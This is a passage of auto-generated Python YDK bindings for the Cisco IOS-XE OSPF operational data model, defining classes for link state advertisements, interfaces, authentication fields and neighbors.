"ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_lsa_mask', (YLeaf(YType.uint32, 'network-lsa-mask'), ['int'])), ('network_attached_routers', (YLeafList(YType.uint32, 'network-attached-routers'), ['int'])), ]) self.network_lsa_mask = None self.network_attached_routers = [] self._segment_path = lambda: "network-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa, ['network_lsa_mask', 'network_attached_routers'], name, value) class NetworkSummaryLsa(Entity): """ The network summary Link State Advertisements .. attribute:: summary_lsa_mask The summary Link State Advertisement mask **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: summary_topo The summary topology **type**\: list of :py:class:`SummaryTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa, self).__init__() self.yang_name = "network-summary-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo))]) self._leafs = OrderedDict([ ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])), ]) self.summary_lsa_mask = None self.summary_topo = YList(self) self._segment_path = lambda: "network-summary-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa, ['summary_lsa_mask'], name, value) class SummaryTopo(Entity): """ The summary topology .. attribute:: mt_id Multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. attribute:: topo_metric Topology Metric **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo, self).__init__() self.yang_name = "summary-topo" self.yang_parent_name = "network-summary-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "summary-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value) class RouterSummaryLsa(Entity): """ The router summary Link State Advertisements .. attribute:: summary_lsa_mask The summary Link State Advertisement mask **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: summary_topo The summary topology **type**\: list of :py:class:`SummaryTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa, self).__init__() self.yang_name = "router-summary-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo))]) self._leafs = OrderedDict([ ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])), ]) self.summary_lsa_mask = None self.summary_topo = YList(self) self._segment_path = lambda: "router-summary-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa, ['summary_lsa_mask'], name, value) class SummaryTopo(Entity): """ The summary topology .. attribute:: mt_id Multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. attribute:: topo_metric Topology Metric **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo, self).__init__() self.yang_name = "summary-topo" self.yang_parent_name = "router-summary-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "summary-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value) class ExternalLsa(Entity): """ The external Link State Advertisements .. attribute:: external_lsa_mask The mask for the external Link State Advertisement **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: external_topo The external topology Link State Advertisement **type**\: list of :py:class:`ExternalTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa, self).__init__() self.yang_name = "external-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo))]) self._leafs = OrderedDict([ ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])), ]) self.external_lsa_mask = None self.external_topo = YList(self) self._segment_path = lambda: "external-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa, ['external_lsa_mask'], name, value) class ExternalTopo(Entity): """ The external topology Link State Advertisement .. attribute:: mt_id The multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. attribute:: topo_metric_type The topoligy metric type associated with the Link State Advertisement **type**\: :py:class:`OspfExternalMetricType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfExternalMetricType>` **config**\: False .. attribute:: topo_metric The topology metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: topo_forwarding_address The topology forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: topo_route_tag The topology route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo, self).__init__() self.yang_name = "external-topo" self.yang_parent_name = "external-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])), ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])), ]) self.mt_id = None self.topo_metric_type = None self.topo_metric = None self.topo_forwarding_address = None self.topo_route_tag = None self._segment_path = lambda: "external-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value) class NssaLsa(Entity): """ The Not So Stubby Area Link state advertisements .. attribute:: external_lsa_mask The mask for the external Link State Advertisement **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: external_topo The external topology Link State Advertisement **type**\: list of :py:class:`ExternalTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa, self).__init__() self.yang_name = "nssa-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo))]) self._leafs = OrderedDict([ ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])), ]) self.external_lsa_mask = None self.external_topo = YList(self) self._segment_path = lambda: "nssa-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa, ['external_lsa_mask'], name, value) class ExternalTopo(Entity): """ The external topology Link State Advertisement .. attribute:: mt_id The multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. attribute:: topo_metric_type The topoligy metric type associated with the Link State Advertisement **type**\: :py:class:`OspfExternalMetricType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfExternalMetricType>` **config**\: False .. attribute:: topo_metric The topology metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: topo_forwarding_address The topology forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: topo_route_tag The topology route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo, self).__init__() self.yang_name = "external-topo" self.yang_parent_name = "nssa-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])), ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])), ]) self.mt_id = None self.topo_metric_type = None self.topo_metric = None self.topo_forwarding_address = None self.topo_route_tag = None self._segment_path = lambda: "external-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value) class Ospfv2Interface(Entity): """ A list of interfaces that belong to the area .. attribute:: name (key) Name of the interface **type**\: str **config**\: False .. attribute:: network_type Network type **type**\: :py:class:`OspfNetworkType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfNetworkType>` **config**\: False .. attribute:: enable If the interface is enabled **type**\: bool **config**\: False .. attribute:: passive If the interface is in passive mode **type**\: bool **config**\: False .. attribute:: demand_circuit If this is a demand circuit **type**\: bool **config**\: False .. attribute:: mtu_ignore If the MTU is being ignored **type**\: bool **config**\: False .. attribute:: prefix_suppresion If prefix suppression is enabled **type**\: bool **config**\: False .. attribute:: cost The OSPFv2 cost **type**\: int **range:** 0..65535 **config**\: False .. attribute:: hello_interval The hello interval in seconds **type**\: int **range:** 0..65535 **config**\: False .. attribute:: dead_interval The dead interval in seconds **type**\: int **range:** 0..65535 **config**\: False .. attribute:: retransmit_interval The retransmit interval in seconds **type**\: int **range:** 0..65535 **config**\: False .. attribute:: transmit_delay The delay before transmitting a keepalive in seconds **type**\: int **range:** 0..65535 **config**\: False .. attribute:: hello_timer The current hello timer in seconds **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: wait_timer The wait timer in seconds **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: dr The designated router identifier **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: bdr The backup designated router identifier **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: dr_ip The address of the designated router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: bdr_ip The address of the backup designated router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: state The current state of the interface **type**\: :py:class:`Ospfv2IntfState <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2IntfState>` **config**\: False .. attribute:: ttl_security_val The TTL security information **type**\: :py:class:`TtlSecurityVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal>` **config**\: False .. attribute:: auth_val The authentication information **type**\: :py:class:`AuthVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal>` **config**\: False .. attribute:: ospfv2_neighbor All the neighbors on the interface **type**\: list of :py:class:`Ospfv2Neighbor <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface, self).__init__() self.yang_name = "ospfv2-interface" self.yang_parent_name = "ospfv2-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([("ttl-security-val", ("ttl_security_val", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal)), ("auth-val", ("auth_val", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal)), ("ospfv2-neighbor", ("ospfv2_neighbor", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor))]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ('network_type', (YLeaf(YType.enumeration, 'network-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfNetworkType', '')])), ('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])), ('passive', (YLeaf(YType.boolean, 'passive'), ['bool'])), ('demand_circuit', (YLeaf(YType.boolean, 'demand-circuit'), ['bool'])), ('mtu_ignore', (YLeaf(YType.boolean, 'mtu-ignore'), ['bool'])), ('prefix_suppresion', (YLeaf(YType.boolean, 'prefix-suppresion'), ['bool'])), ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])), ('hello_interval', (YLeaf(YType.uint16, 'hello-interval'), ['int'])), ('dead_interval', (YLeaf(YType.uint16, 'dead-interval'), ['int'])), ('retransmit_interval', (YLeaf(YType.uint16, 'retransmit-interval'), ['int'])), ('transmit_delay', (YLeaf(YType.uint16, 'transmit-delay'), ['int'])), ('hello_timer', (YLeaf(YType.uint32, 'hello-timer'), ['int'])), ('wait_timer', (YLeaf(YType.uint32, 'wait-timer'), ['int'])), ('dr', (YLeaf(YType.uint32, 'dr'), ['int'])), ('bdr', (YLeaf(YType.uint32, 'bdr'), ['int'])), ('dr_ip', (YLeaf(YType.str, 'dr-ip'), ['str','str'])), ('bdr_ip', (YLeaf(YType.str, 'bdr-ip'), ['str','str'])), ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'Ospfv2IntfState', '')])), ]) self.name = None self.network_type = None self.enable = None self.passive = None self.demand_circuit = None self.mtu_ignore = None self.prefix_suppresion = None self.cost = None self.hello_interval = None self.dead_interval = None self.retransmit_interval = None self.transmit_delay = None self.hello_timer = None self.wait_timer = None self.dr = None self.bdr = None self.dr_ip = None self.bdr_ip = None self.state = None self.ttl_security_val = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal() self.ttl_security_val.parent = self self._children_name_map["ttl_security_val"] = "ttl-security-val" self.auth_val = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal() self.auth_val.parent = self self._children_name_map["auth_val"] = "auth-val" self.ospfv2_neighbor = YList(self) self._segment_path = lambda: "ospfv2-interface" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface, ['name', 'network_type', 'enable', 'passive', 'demand_circuit', 'mtu_ignore', 'prefix_suppresion', 'cost', 'hello_interval', 'dead_interval', 'retransmit_interval', 'transmit_delay', 'hello_timer', 'wait_timer', 'dr', 'bdr', 'dr_ip', 'bdr_ip', 'state'], name, value) class TtlSecurityVal(Entity): """ The TTL security information .. attribute:: enable Indicates whether time to live security is enabled **type**\: bool **config**\: False .. attribute:: hops Number of hops for time to live security **type**\: int **range:** \-2147483648..2147483647 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal, self).__init__() self.yang_name = "ttl-security-val" self.yang_parent_name = "ospfv2-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])), ('hops', (YLeaf(YType.int32, 'hops'), ['int'])), ]) self.enable = None self.hops = None self._segment_path = lambda: "ttl-security-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal, ['enable', 'hops'], name, value) class AuthVal(Entity): """ The authentication information .. attribute:: no_auth No authentication in use **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: auth_key Trailer key chain information **type**\: :py:class:`AuthKey <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey>` **config**\: False .. attribute:: key_chain Trailer key information **type**\: :py:class:`KeyChain <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal, self).__init__() self.yang_name = "auth-val" self.yang_parent_name = "ospfv2-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("auth-key", ("auth_key", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey)), ("key-chain", ("key_chain", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain))]) self._leafs = OrderedDict([ ('no_auth', (YLeaf(YType.uint32, 'no-auth'), ['int'])), ]) self.no_auth = None self.auth_key = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey() self.auth_key.parent = self self._children_name_map["auth_key"] = "auth-key" self.key_chain = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain() self.key_chain.parent = self self._children_name_map["key_chain"] = "key-chain" self._segment_path = lambda: "auth-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal, ['no_auth'], name, value) class AuthKey(Entity): """ Trailer key chain information .. attribute:: key_id The key identifier **type**\: int **range:** 0..255 **config**\: False .. attribute:: key_string The key string **type**\: list of int **range:** 0..255 **config**\: False .. attribute:: crypto_algo The algorithm in use **type**\: :py:class:`Ospfv2CryptoAlgorithm <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2CryptoAlgorithm>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey, self).__init__() self.yang_name = "auth-key" self.yang_parent_name = "auth-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('key_id', (YLeaf(YType.uint8, 'key-id'), ['int'])), ('key_string', (YLeafList(YType.uint8, 'key-string'), ['int'])), ('crypto_algo', (YLeaf(YType.enumeration, 'crypto-algo'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'Ospfv2CryptoAlgorithm', '')])), ]) self.key_id = None self.key_string = [] self.crypto_algo = None self._segment_path = lambda: "auth-key" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey, ['key_id', 'key_string', 'crypto_algo'], name, value) class KeyChain(Entity): """ Trailer key information .. attribute:: key_chain The key chain **type**\: list of int **range:** 0..255 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain, self).__init__() self.yang_name = "key-chain" self.yang_parent_name = "auth-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('key_chain', (YLeafList(YType.uint8, 'key-chain'), ['int'])), ]) self.key_chain = [] self._segment_path = lambda: "key-chain" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain, ['key_chain'], name, value) class Ospfv2Neighbor(Entity): """ All the neighbors on the interface .. attribute:: nbr_id (key) The neighbor identifier **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: address Neighbor address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: dr The neighbor's Designated Router indentifier **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: bdr The neighbor's Backup Designated Router identifier **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: dr_ip The designated routers' IP address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: bdr_ip The backup designated routers' IP address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: event_count A count of neighbor events **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: retrans_count A count of the retransmission events **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: state The current neighbor state **type**\: :py:class:`NbrStateType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.NbrStateType>` **config**\: False .. attribute:: dead_timer The dead timer in seconds **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor, self).__init__() self.yang_name = "ospfv2-neighbor" self.yang_parent_name = "ospfv2-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['nbr_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('nbr_id', (YLeaf(YType.uint32, 'nbr-id'), ['int'])), ('address', (YLeaf(YType.str, 'address'), ['str','str'])), ('dr', 